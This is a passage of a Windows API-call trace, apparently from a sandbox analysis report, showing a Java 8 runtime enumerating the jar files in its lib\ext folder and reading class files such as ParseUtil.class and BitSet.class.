ftLastWriteTime.dwLowDateTime=0xed1ee857, ftLastWriteTime.dwHighDateTime=0x1d709ec, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2101000, cFileName=".", cAlternateFileName="")) returned 0x426020 [0099.764] free (_Block=0x1220f640) [0099.764] wcscmp (_String1=".", _String2=".") returned 0 [0099.764] FindNextFileW (in: hFindFile=0x426020, lpFindFileData=0x208dba0 | out: lpFindFileData=0x208dba0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeb394937, ftCreationTime.dwHighDateTime=0x1d709ec, ftLastAccessTime.dwLowDateTime=0xed1ee857, ftLastAccessTime.dwHighDateTime=0x1d709ec, ftLastWriteTime.dwLowDateTime=0xed1ee857, ftLastWriteTime.dwHighDateTime=0x1d709ec, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2101000, cFileName="..", cAlternateFileName="")) returned 1 [0099.765] wcscmp (_String1="..", _String2=".") returned 1 [0099.765] wcscmp (_String1="..", _String2="..") returned 0 [0099.765] FindNextFileW (in: hFindFile=0x426020, lpFindFileData=0x208dba0 | out: lpFindFileData=0x208dba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xeb397047, ftCreationTime.dwHighDateTime=0x1d709ec, ftLastAccessTime.dwLowDateTime=0xeb397047, ftLastAccessTime.dwHighDateTime=0x1d709ec, ftLastWriteTime.dwLowDateTime=0xeb397047, ftLastWriteTime.dwHighDateTime=0x1d709ec, nFileSizeHigh=0x0, nFileSizeLow=0x30134, dwReserved0=0x0, dwReserved1=0x2101000, cFileName="access-bridge-64.jar", cAlternateFileName="ACCESS~1.JAR")) returned 1 [0099.765] wcscmp (_String1="access-bridge-64.jar", _String2=".") returned 1 [0099.765] wcscmp (_String1="access-bridge-64.jar", _String2="..") returned 1 [0099.765] wcslen (_String="access-bridge-64.jar") returned 0x14 [0099.765] FindNextFileW (in: hFindFile=0x426020, lpFindFileData=0x208dba0 | out: lpFindFileData=0x208dba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xeb39aae1, ftCreationTime.dwHighDateTime=0x1d709ec, ftLastAccessTime.dwLowDateTime=0xeb39aae1, ftLastAccessTime.dwHighDateTime=0x1d709ec, ftLastWriteTime.dwLowDateTime=0xeb3a33d2, ftLastWriteTime.dwHighDateTime=0x1d709ec, nFileSizeHigh=0x0, nFileSizeLow=0x3ae816, dwReserved0=0x0, dwReserved1=0x2101000, cFileName="cldrdata.jar", cAlternateFileName="")) returned 1 [0099.765] wcscmp (_String1="cldrdata.jar", _String2=".") returned 1 [0099.765] wcscmp (_String1="cldrdata.jar", _String2="..") returned 1 [0099.765] wcslen (_String="cldrdata.jar") returned 0xc [0099.766] FindNextFileW (in: hFindFile=0x426020, lpFindFileData=0x208dba0 | out: lpFindFileData=0x208dba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xeb3a4834, ftCreationTime.dwHighDateTime=0x1d709ec, ftLastAccessTime.dwLowDateTime=0xeb3a4834, ftLastAccessTime.dwHighDateTime=0x1d709ec, ftLastWriteTime.dwLowDateTime=0xeb3a4834, ftLastWriteTime.dwHighDateTime=0x1d709ec, nFileSizeHigh=0x0, nFileSizeLow=0x205e, dwReserved0=0x0, dwReserved1=0x2101000, cFileName="dnsns.jar", cAlternateFileName="")) returned 1 [0099.766] wcscmp (_String1="dnsns.jar", _String2=".") returned 1 [0099.766] wcscmp (_String1="dnsns.jar", _String2="..") returned 1 [0099.766] wcslen (_String="dnsns.jar") returned 0x9 [0099.766] FindNextFileW (in: hFindFile=0x426020, lpFindFileData=0x208dba0 | out: lpFindFileData=0x208dba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xeb3a4834, ftCreationTime.dwHighDateTime=0x1d709ec, ftLastAccessTime.dwLowDateTime=0xeb3a4834, ftLastAccessTime.dwHighDateTime=0x1d709ec, ftLastWriteTime.dwLowDateTime=0xeb3a4834, ftLastWriteTime.dwHighDateTime=0x1d709ec, nFileSizeHigh=0x0, nFileSizeLow=0xade4, dwReserved0=0x0, dwReserved1=0x2101000, cFileName="jaccess.jar", cAlternateFileName="")) returned 1 [0099.766] wcscmp (_String1="jaccess.jar", _String2=".") returned 1 [0099.766] wcscmp (_String1="jaccess.jar", _String2="..") returned 1 [0099.766] wcslen (_String="jaccess.jar") returned 0xb [0099.766] FindNextFileW (in: hFindFile=0x426020, lpFindFileData=0x208dba0 | out: lpFindFileData=0x208dba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xeb3b45b0, ftCreationTime.dwHighDateTime=0x1d709ec, ftLastAccessTime.dwLowDateTime=0xeb3b45b0, ftLastAccessTime.dwHighDateTime=0x1d709ec, ftLastWriteTime.dwLowDateTime=0xeb3e044f, ftLastWriteTime.dwHighDateTime=0x1d709ec, nFileSizeHigh=0x0, nFileSizeLow=0x11610cf, dwReserved0=0x0, dwReserved1=0x2101000, cFileName="jfxrt.jar", cAlternateFileName="")) returned 1 [0099.766] wcscmp (_String1="jfxrt.jar", _String2=".") returned 1 [0099.766] wcscmp (_String1="jfxrt.jar", _String2="..") returned 1 [0099.766] wcslen (_String="jfxrt.jar") returned 0x9 [0099.767] FindNextFileW (in: hFindFile=0x426020, lpFindFileData=0x208dba0 | out: lpFindFileData=0x208dba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xed16d23d, ftCreationTime.dwHighDateTime=0x1d709ec, ftLastAccessTime.dwLowDateTime=0xed16d23d, ftLastAccessTime.dwHighDateTime=0x1d709ec, ftLastWriteTime.dwLowDateTime=0xed1ee857, ftLastWriteTime.dwHighDateTime=0x1d709ec, nFileSizeHigh=0x0, nFileSizeLow=0x21a293, dwReserved0=0x0, dwReserved1=0x2101000, cFileName="localedata.jar", cAlternateFileName="LOCALE~1.JAR")) returned 1 [0099.767] wcscmp (_String1="localedata.jar", _String2=".") returned 1 [0099.767] wcscmp (_String1="localedata.jar", _String2="..") returned 1 [0099.767] wcslen (_String="localedata.jar") returned 0xe [0099.767] FindNextFileW (in: hFindFile=0x426020, lpFindFileData=0x208dba0 | out: lpFindFileData=0x208dba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xeb3e044f, ftCreationTime.dwHighDateTime=0x1d709ec, ftLastAccessTime.dwLowDateTime=0xeb3e044f, ftLastAccessTime.dwHighDateTime=0x1d709ec, ftLastWriteTime.dwLowDateTime=0xeb3e1944, ftLastWriteTime.dwHighDateTime=0x1d709ec, nFileSizeHigh=0x0, nFileSizeLow=0x5b5, dwReserved0=0x0, dwReserved1=0x2101000, cFileName="meta-index", cAlternateFileName="META-I~1")) returned 1 [0099.767] wcscmp (_String1="meta-index", _String2=".") returned 1 [0099.767] wcscmp (_String1="meta-index", _String2="..") returned 1 [0099.767] wcslen (_String="meta-index") returned 0xa [0099.767] FindNextFileW (in: hFindFile=0x426020, lpFindFileData=0x208dba0 | out: lpFindFileData=0x208dba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xeb3e5249, ftCreationTime.dwHighDateTime=0x1d709ec, ftLastAccessTime.dwLowDateTime=0xeb3e5249, ftLastAccessTime.dwHighDateTime=0x1d709ec, ftLastWriteTime.dwLowDateTime=0xeb3ea1c7, ftLastWriteTime.dwHighDateTime=0x1d709ec, nFileSizeHigh=0x0, nFileSizeLow=0x1ee1cc, dwReserved0=0x0, dwReserved1=0x2101000, cFileName="nashorn.jar", cAlternateFileName="")) returned 1 [0099.767] wcscmp (_String1="nashorn.jar", _String2=".") returned 1 [0099.767] wcscmp (_String1="nashorn.jar", _String2="..") returned 1 [0099.767] wcslen (_String="nashorn.jar") returned 0xb [0099.767] FindNextFileW (in: hFindFile=0x426020, lpFindFileData=0x208dba0 | out: lpFindFileData=0x208dba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xeb3ea1c7, ftCreationTime.dwHighDateTime=0x1d709ec, ftLastAccessTime.dwLowDateTime=0xeb3ea1c7, ftLastAccessTime.dwHighDateTime=0x1d709ec, ftLastWriteTime.dwLowDateTime=0xeb3ea1c7, ftLastWriteTime.dwHighDateTime=0x1d709ec, nFileSizeHigh=0x0, nFileSizeLow=0xa2c8, dwReserved0=0x0, dwReserved1=0x2101000, cFileName="sunec.jar", cAlternateFileName="")) returned 1 [0099.767] wcscmp (_String1="sunec.jar", _String2=".") returned 1 [0099.767] wcscmp (_String1="sunec.jar", _String2="..") returned 1 [0099.767] wcslen (_String="sunec.jar") returned 0x9 [0099.767] FindNextFileW (in: hFindFile=0x426020, lpFindFileData=0x208dba0 | out: lpFindFileData=0x208dba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xeb3ec780, ftCreationTime.dwHighDateTime=0x1d709ec, ftLastAccessTime.dwLowDateTime=0xeb3ec780, ftLastAccessTime.dwHighDateTime=0x1d709ec, ftLastWriteTime.dwLowDateTime=0xeb3edb58, ftLastWriteTime.dwHighDateTime=0x1d709ec, nFileSizeHigh=0x0, nFileSizeLow=0x43d4a, dwReserved0=0x0, dwReserved1=0x2101000, cFileName="sunjce_provider.jar", cAlternateFileName="SUNJCE~1.JAR")) returned 1 [0099.768] wcscmp (_String1="sunjce_provider.jar", _String2=".") returned 1 [0099.768] wcscmp (_String1="sunjce_provider.jar", _String2="..") returned 1 [0099.768] wcslen (_String="sunjce_provider.jar") returned 0x13 [0099.768] FindNextFileW (in: hFindFile=0x426020, lpFindFileData=0x208dba0 | out: lpFindFileData=0x208dba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xeb3edb58, ftCreationTime.dwHighDateTime=0x1d709ec, ftLastAccessTime.dwLowDateTime=0xeb3edb58, ftLastAccessTime.dwHighDateTime=0x1d709ec, ftLastWriteTime.dwLowDateTime=0xeb3edb58, ftLastWriteTime.dwHighDateTime=0x1d709ec, nFileSizeHigh=0x0, nFileSizeLow=0x8177, dwReserved0=0x0, dwReserved1=0x2101000, cFileName="sunmscapi.jar", cAlternateFileName="SUNMSC~1.JAR")) returned 1 [0099.768] wcscmp (_String1="sunmscapi.jar", _String2=".") returned 1 [0099.768] wcscmp (_String1="sunmscapi.jar", _String2="..") returned 1 [0099.768] wcslen (_String="sunmscapi.jar") returned 0xd [0099.768] FindNextFileW (in: hFindFile=0x426020, lpFindFileData=0x208dba0 | out: lpFindFileData=0x208dba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xeb3eef67, ftCreationTime.dwHighDateTime=0x1d709ec, ftLastAccessTime.dwLowDateTime=0xeb3eef67, ftLastAccessTime.dwHighDateTime=0x1d709ec, ftLastWriteTime.dwLowDateTime=0xeb3f033f, ftLastWriteTime.dwHighDateTime=0x1d709ec, nFileSizeHigh=0x0, nFileSizeLow=0x3d113, dwReserved0=0x0, dwReserved1=0x2101000, cFileName="sunpkcs11.jar", cAlternateFileName="SUNPKC~1.JAR")) returned 1 [0099.768] wcscmp (_String1="sunpkcs11.jar", _String2=".") returned 1 [0099.768] wcscmp (_String1="sunpkcs11.jar", _String2="..") returned 1 [0099.768] wcslen (_String="sunpkcs11.jar") returned 0xd [0099.768] FindNextFileW (in: hFindFile=0x426020, lpFindFileData=0x208dba0 | out: lpFindFileData=0x208dba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xeb3f033f, ftCreationTime.dwHighDateTime=0x1d709ec, ftLastAccessTime.dwLowDateTime=0xeb3f033f, ftLastAccessTime.dwHighDateTime=0x1d709ec, ftLastWriteTime.dwLowDateTime=0xeb3f033f, ftLastWriteTime.dwHighDateTime=0x1d709ec, nFileSizeHigh=0x0, nFileSizeLow=0x10d63, dwReserved0=0x0, dwReserved1=0x2101000, cFileName="zipfs.jar", cAlternateFileName="")) returned 1 [0099.768] wcscmp (_String1="zipfs.jar", _String2=".") returned 1 [0099.768] wcscmp (_String1="zipfs.jar", _String2="..") returned 1 [0099.768] wcslen (_String="zipfs.jar") returned 0x9 [0099.768] FindNextFileW (in: hFindFile=0x426020, lpFindFileData=0x208dba0 | out: lpFindFileData=0x208dba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xeb3f033f, ftCreationTime.dwHighDateTime=0x1d709ec, ftLastAccessTime.dwLowDateTime=0xeb3f033f, ftLastAccessTime.dwHighDateTime=0x1d709ec, ftLastWriteTime.dwLowDateTime=0xeb3f033f, ftLastWriteTime.dwHighDateTime=0x1d709ec, nFileSizeHigh=0x0, nFileSizeLow=0x10d63, dwReserved0=0x0, dwReserved1=0x2101000, cFileName="zipfs.jar", cAlternateFileName="")) returned 0 [0099.769] GetLastError () returned 0x12 [0099.769] FindClose (in: hFindFile=0x426020 | out: hFindFile=0x426020) returned 1 [0099.771] wcslen (_String="C:\\Program Files\\Java\\jre1.8.0_171\\lib\\ext\\access-bridge-64.jar") returned 0x3f [0099.771] malloc (_Size=0x800) returned 0x12229370 [0099.771] _wfullpath (in: _Buffer=0x12229370, _Path="C:\\Program Files\\Java\\jre1.8.0_171\\lib\\ext\\access-bridge-64.jar", _BufferCount=0x400 | out: _Buffer="C:\\Program Files\\Java\\jre1.8.0_171\\lib\\ext\\access-bridge-64.jar") returned="C:\\Program Files\\Java\\jre1.8.0_171\\lib\\ext\\access-bridge-64.jar" [0099.771] wcslen (_String="C:\\Program Files\\Java\\jre1.8.0_171\\lib\\ext\\access-bridge-64.jar") returned 0x3f [0099.771] wcsncmp (_String1="C:\\P", _String2="\\\\.\\", _MaxCount=0x4) returned -25 [0099.771] wcslen (_String="C:\\Program Files") returned 0x10 [0099.771] FindFirstFileW (in: lpFileName="C:\\Program Files", lpFindFileData=0x208d1f0 | out: lpFindFileData=0x208d1f0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x31bae0f4, ftCreationTime.dwHighDateTime=0x1d112dc, ftLastAccessTime.dwLowDateTime=0x61f7ccc8, ftLastAccessTime.dwHighDateTime=0x1d7e78c, ftLastWriteTime.dwLowDateTime=0x61f7ccc8, ftLastWriteTime.dwHighDateTime=0x1d7e78c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x12130000, cFileName="Program Files", cAlternateFileName="PROGRA~1")) returned 0x425960 [0099.771] FindClose (in: hFindFile=0x425960 | out: hFindFile=0x425960) returned 1 [0099.771] wcslen (_String="Program Files") returned 0xd [0099.771] wcslen (_String="C:\\Program Files\\Java") returned 0x15 [0099.771] FindFirstFileW (in: lpFileName="C:\\Program Files\\Java", lpFindFileData=0x208d1f0 | out: lpFindFileData=0x208d1f0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xe1d180aa, ftCreationTime.dwHighDateTime=0x1d709ec, ftLastAccessTime.dwLowDateTime=0x5848ff34, ftLastAccessTime.dwHighDateTime=0x1d7e78c, ftLastWriteTime.dwLowDateTime=0x5848ff34, ftLastWriteTime.dwHighDateTime=0x1d7e78c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x12130000, cFileName="Java", cAlternateFileName="")) returned 0x425960 [0099.772] FindClose (in: hFindFile=0x425960 | out: hFindFile=0x425960) returned 1 [0099.772] wcslen (_String="Java") returned 0x4 [0099.772] wcslen (_String="C:\\Program Files\\Java\\jre1.8.0_171") returned 0x22 [0099.772] FindFirstFileW (in: lpFileName="C:\\Program Files\\Java\\jre1.8.0_171", lpFindFileData=0x208d1f0 | out: lpFindFileData=0x208d1f0*(dwFileAttributes=0x30, ftCreationTime.dwLowDateTime=0xe1d180aa, ftCreationTime.dwHighDateTime=0x1d709ec, ftLastAccessTime.dwLowDateTime=0xf4cc0a4e, ftLastAccessTime.dwHighDateTime=0x1d709ec, ftLastWriteTime.dwLowDateTime=0xf4cc0a4e, ftLastWriteTime.dwHighDateTime=0x1d709ec, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x12130000, cFileName="jre1.8.0_171", cAlternateFileName="JRE18~1.0_1")) returned 0x425fc0 [0099.772] FindClose (in: hFindFile=0x425fc0 | out: hFindFile=0x425fc0) returned 1 [0099.772] wcslen (_String="jre1.8.0_171") returned 0xc [0099.772] wcslen (_String="C:\\Program Files\\Java\\jre1.8.0_171\\lib") returned 0x26 [0099.772] FindFirstFileW (in: lpFileName="C:\\Program Files\\Java\\jre1.8.0_171\\lib", lpFindFileData=0x208d1f0 | out: lpFindFileData=0x208d1f0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeb3761f6, ftCreationTime.dwHighDateTime=0x1d709ec, ftLastAccessTime.dwLowDateTime=0xed126697, ftLastAccessTime.dwHighDateTime=0x1d709ec, ftLastWriteTime.dwLowDateTime=0xed126697, ftLastWriteTime.dwHighDateTime=0x1d709ec, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x12130000, cFileName="lib", cAlternateFileName="")) returned 0x4263e0 [0099.772] FindClose (in: hFindFile=0x4263e0 | out: hFindFile=0x4263e0) returned 1 [0099.772] wcslen (_String="lib") returned 0x3 [0099.772] wcslen (_String="C:\\Program Files\\Java\\jre1.8.0_171\\lib\\ext") returned 0x2a [0099.772] FindFirstFileW (in: lpFileName="C:\\Program Files\\Java\\jre1.8.0_171\\lib\\ext", lpFindFileData=0x208d1f0 | out: lpFindFileData=0x208d1f0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeb394937, ftCreationTime.dwHighDateTime=0x1d709ec, ftLastAccessTime.dwLowDateTime=0xed1ee857, ftLastAccessTime.dwHighDateTime=0x1d709ec, ftLastWriteTime.dwLowDateTime=0xed1ee857, ftLastWriteTime.dwHighDateTime=0x1d709ec, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x12130000, cFileName="ext", cAlternateFileName="")) returned 0x426320 [0099.773] FindClose (in: hFindFile=0x426320 | out: hFindFile=0x426320) returned 1 [0099.773] wcslen (_String="ext") returned 0x3 [0099.773] wcslen (_String="C:\\Program Files\\Java\\jre1.8.0_171\\lib\\ext\\access-bridge-64.jar") returned 0x3f [0099.773] FindFirstFileW (in: lpFileName="C:\\Program Files\\Java\\jre1.8.0_171\\lib\\ext\\access-bridge-64.jar", lpFindFileData=0x208d1f0 | out: lpFindFileData=0x208d1f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xeb397047, ftCreationTime.dwHighDateTime=0x1d709ec, ftLastAccessTime.dwLowDateTime=0xeb397047, ftLastAccessTime.dwHighDateTime=0x1d709ec, ftLastWriteTime.dwLowDateTime=0xeb397047, ftLastWriteTime.dwHighDateTime=0x1d709ec, nFileSizeHigh=0x0, nFileSizeLow=0x30134, dwReserved0=0x0, dwReserved1=0x12130000, cFileName="access-bridge-64.jar", cAlternateFileName="ACCESS~1.JAR")) returned 0x426860 [0099.773] FindClose (in: hFindFile=0x426860 | out: hFindFile=0x426860) returned 1 [0099.773] wcslen (_String="access-bridge-64.jar") returned 0x14 [0099.773] free (_Block=0x12229370) [0099.774] wcslen (_String="C:\\Program Files\\Java\\jre1.8.0_171\\lib\\ext\\access-bridge-64.jar") returned 0x3f [0099.774] wcslen (_String="C:\\Program Files\\Java\\jre1.8.0_171\\lib\\ext\\access-bridge-64.jar") returned 0x3f [0099.774] malloc (_Size=0x8a) returned 0x12229370 [0099.774] wcscpy (in: _Dest=0x12229370, _Source="C:\\Program Files\\Java\\jre1.8.0_171\\lib\\ext\\access-bridge-64.jar" | out: _Dest="C:\\Program Files\\Java\\jre1.8.0_171\\lib\\ext\\access-bridge-64.jar") returned="C:\\Program Files\\Java\\jre1.8.0_171\\lib\\ext\\access-bridge-64.jar" [0099.774] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Java\\jre1.8.0_171\\lib\\ext\\access-bridge-64.jar", nBufferLength=0x9, lpBuffer=0x208dc28, lpFilePart=0x208dc20 | out: lpBuffer="", lpFilePart=0x208dc20*=0x0) returned 0x40 [0099.774] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Java\\jre1.8.0_171\\lib\\ext\\access-bridge-64.jar" (normalized: "c:\\program files\\java\\jre1.8.0_171\\lib\\ext\\access-bridge-64.jar"), fInfoLevelId=0x0, lpFileInformation=0x208d9c0 | out: lpFileInformation=0x208d9c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xeb397047, ftCreationTime.dwHighDateTime=0x1d709ec, ftLastAccessTime.dwLowDateTime=0xeb397047, ftLastAccessTime.dwHighDateTime=0x1d709ec, ftLastWriteTime.dwLowDateTime=0xeb397047, ftLastWriteTime.dwHighDateTime=0x1d709ec, nFileSizeHigh=0x0, nFileSizeLow=0x30134)) returned 1 [0099.775] free (_Block=0x12229370) [0099.775] wcslen (_String="C:\\Program Files\\Java\\jre1.8.0_171\\lib\\ext\\access-bridge-64.jar") returned 0x3f [0099.775] malloc (_Size=0x8a) returned 0x12229370 [0099.776] wcscpy (in: _Dest=0x12229370, _Source="C:\\Program Files\\Java\\jre1.8.0_171\\lib\\ext\\access-bridge-64.jar" | out: _Dest="C:\\Program Files\\Java\\jre1.8.0_171\\lib\\ext\\access-bridge-64.jar") returned="C:\\Program Files\\Java\\jre1.8.0_171\\lib\\ext\\access-bridge-64.jar" [0099.776] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Java\\jre1.8.0_171\\lib\\ext\\access-bridge-64.jar", nBufferLength=0x9, lpBuffer=0x208dc28, lpFilePart=0x208dc20 | out: lpBuffer="", lpFilePart=0x208dc20*=0x0) returned 0x40 [0099.776] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Java\\jre1.8.0_171\\lib\\ext\\access-bridge-64.jar" (normalized: "c:\\program files\\java\\jre1.8.0_171\\lib\\ext\\access-bridge-64.jar"), fInfoLevelId=0x0, lpFileInformation=0x208d9c0 | out: lpFileInformation=0x208d9c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xeb397047, ftCreationTime.dwHighDateTime=0x1d709ec, ftLastAccessTime.dwLowDateTime=0xeb397047, ftLastAccessTime.dwHighDateTime=0x1d709ec, ftLastWriteTime.dwLowDateTime=0xeb397047, ftLastWriteTime.dwHighDateTime=0x1d709ec, nFileSizeHigh=0x0, nFileSizeLow=0x30134)) returned 1 [0099.776] free (_Block=0x12229370) [0099.777] strlen (_Str="sun/net/www/ParseUtil.class") returned 0x1b [0099.777] malloc (_Size=0x48) returned 0x121d9c60 [0099.777] malloc (_Size=0xa0) returned 0x122292e0 [0099.777] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x3419f79, lpNewFilePointer=0x208cb50, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208cb50*=54632313) returned 1 [0099.777] ReadFile (in: hFile=0x134, lpBuffer=0x122292e0, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208cb20, lpOverlapped=0x0 | out: lpBuffer=0x122292e0*, lpNumberOfBytesRead=0x208cb20*=0xa0, lpOverlapped=0x0) returned 1 [0099.777] malloc (_Size=0x1c) returned 0x121d80c0 [0099.777] free (_Block=0x122292e0) [0099.777] strlen (_Str="sun/net/www/ParseUtil.class") returned 0x1b [0099.777] strcpy (in: _Dest=0x208ccd0, _Source="sun/net/www/ParseUtil.class" | out: _Dest="sun/net/www/ParseUtil.class") returned="sun/net/www/ParseUtil.class" [0099.777] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x313fdd0, lpNewFilePointer=0x208c750, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208c750*=51641808) returned 1 [0099.777] ReadFile (in: hFile=0x134, lpBuffer=0x208c7a0, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208c720, lpOverlapped=0x0 | out: lpBuffer=0x208c7a0*, lpNumberOfBytesRead=0x208c720*=0x1e, lpOverlapped=0x0) returned 1 [0099.834] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x313fe09, lpNewFilePointer=0x208c7b0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208c7b0*=51641865) returned 1 [0099.834] ReadFile (in: hFile=0x134, lpBuffer=0x2102a30, nNumberOfBytesToRead=0x27d5, lpNumberOfBytesRead=0x208c780, lpOverlapped=0x0 | out: lpBuffer=0x2102a30*, lpNumberOfBytesRead=0x208c780*=0x27d5, lpOverlapped=0x0) returned 1 [0099.885] free (_Block=0x121d7e80) [0099.885] free (_Block=0x121d8fe0) [0099.897] strlen (_Str="java/util/BitSet.class") returned 0x16 [0099.897] malloc (_Size=0x48) returned 0x121d8fe0 [0099.897] malloc (_Size=0xa0) returned 0x122292e0 [0099.897] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x3419f35, lpNewFilePointer=0x208c4c0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208c4c0*=54632245) returned 1 [0099.897] ReadFile (in: hFile=0x134, lpBuffer=0x122292e0, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208c490, lpOverlapped=0x0 | out: lpBuffer=0x122292e0*, lpNumberOfBytesRead=0x208c490*=0xa0, lpOverlapped=0x0) returned 1 [0099.904] malloc (_Size=0x17) returned 0x1221b4e0 [0099.905] free (_Block=0x122292e0) [0099.905] strlen (_Str="java/util/BitSet.class") returned 0x16 [0099.905] strcpy (in: _Dest=0x208c640, _Source="java/util/BitSet.class" | out: _Dest="java/util/BitSet.class") returned="java/util/BitSet.class" [0099.905] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x313d531, lpNewFilePointer=0x208c0c0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208c0c0*=51631409) returned 1 [0099.905] ReadFile (in: hFile=0x134, lpBuffer=0x208c110, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208c090, lpOverlapped=0x0 | out: lpBuffer=0x208c110*, lpNumberOfBytesRead=0x208c090*=0x1e, lpOverlapped=0x0) returned 1 [0099.950] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x313d565, lpNewFilePointer=0x208c120, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208c120*=51631461) returned 1 [0099.950] ReadFile (in: hFile=0x134, lpBuffer=0x2102a30, nNumberOfBytesToRead=0x286b, lpNumberOfBytesRead=0x208c0f0, lpOverlapped=0x0 | out: lpBuffer=0x2102a30*, lpNumberOfBytesRead=0x208c0f0*=0x286b, lpOverlapped=0x0) returned 1 [0099.986] free (_Block=0x121d80c0) [0099.987] free (_Block=0x121d9c60) [0100.051] wcslen (_String="C:\\Program Files\\Java\\jre1.8.0_171\\lib\\ext\\access-bridge-64.jar") returned 0x3f [0100.051] malloc (_Size=0x8a) returned 0x12229370 [0100.051] wcscpy (in: _Dest=0x12229370, _Source="C:\\Program Files\\Java\\jre1.8.0_171\\lib\\ext\\access-bridge-64.jar" | out: _Dest="C:\\Program Files\\Java\\jre1.8.0_171\\lib\\ext\\access-bridge-64.jar") returned="C:\\Program Files\\Java\\jre1.8.0_171\\lib\\ext\\access-bridge-64.jar" [0100.051] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Java\\jre1.8.0_171\\lib\\ext\\access-bridge-64.jar", nBufferLength=0x9, lpBuffer=0x208dd08, lpFilePart=0x208dd00 | out: lpBuffer="", lpFilePart=0x208dd00*=0x0) returned 0x40 [0100.051] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Java\\jre1.8.0_171\\lib\\ext\\access-bridge-64.jar" (normalized: "c:\\program files\\java\\jre1.8.0_171\\lib\\ext\\access-bridge-64.jar"), fInfoLevelId=0x0, lpFileInformation=0x208daa0 | out: lpFileInformation=0x208daa0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xeb397047, ftCreationTime.dwHighDateTime=0x1d709ec, ftLastAccessTime.dwLowDateTime=0xeb397047, ftLastAccessTime.dwHighDateTime=0x1d709ec, ftLastWriteTime.dwLowDateTime=0xeb397047, ftLastWriteTime.dwHighDateTime=0x1d709ec, nFileSizeHigh=0x0, nFileSizeLow=0x30134)) returned 1 [0100.052] free (_Block=0x12229370) [0100.063] strlen (_Str="java/net/Parts.class") returned 0x14 [0100.064] malloc (_Size=0x48) returned 0x121d9080 [0100.064] malloc (_Size=0xa0) returned 0x122292e0 [0100.064] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x3419ef3, lpNewFilePointer=0x208cc30, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208cc30*=54632179) returned 1 [0100.064] ReadFile (in: hFile=0x134, lpBuffer=0x122292e0, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208cc00, lpOverlapped=0x0 | out: lpBuffer=0x122292e0*, lpNumberOfBytesRead=0x208cc00*=0xa0, lpOverlapped=0x0) returned 1 [0100.065] malloc (_Size=0x15) returned 0x1221b2a0 [0100.065] free (_Block=0x122292e0) [0100.066] strlen (_Str="java/net/Parts.class") returned 0x14 [0100.066] strcpy (in: _Dest=0x208cdb0, _Source="java/net/Parts.class" | out: _Dest="java/net/Parts.class") returned="java/net/Parts.class" [0100.066] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x313d241, lpNewFilePointer=0x208c830, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208c830*=51630657) returned 1 [0100.066] ReadFile (in: hFile=0x134, lpBuffer=0x208c880, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208c800, lpOverlapped=0x0 | out: lpBuffer=0x208c880*, lpNumberOfBytesRead=0x208c800*=0x1e, lpOverlapped=0x0) returned 1 [0100.067] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x313d273, lpNewFilePointer=0x208c890, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208c890*=51630707) returned 1 [0100.067] ReadFile (in: hFile=0x134, lpBuffer=0x2102a30, 